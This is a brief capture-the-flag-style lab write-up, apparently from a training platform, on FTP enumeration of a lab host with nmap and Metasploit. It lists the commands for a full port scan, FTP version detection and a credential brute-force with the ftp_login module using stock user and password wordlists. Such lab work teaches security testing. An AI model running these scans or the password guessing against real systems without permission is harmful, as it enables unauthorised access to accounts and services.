FTP Enumeration

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Your task is to perform FTP enumeration with Metasploit.

Tools

The best tools for this lab are:

  • Metasploit Framework

  • FTP client

Writeup

ping -c 1 demo.ine.local
nmap -p- -sSVC --min-rate 7000 -n -Pn demo.ine.local -vvv
msfconsole
search auxiliary/scanner/ftp/
use auxiliary/scanner/ftp/ftp_version 
set rhosts demo.ine.local
run
use auxiliary/scanner/ftp/ftp_login
set rhosts demo.ine.local
set USER_FILE /usr/share/wordlists/metasploit/common_users.txt
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run
ftp demo.ine.local

Last updated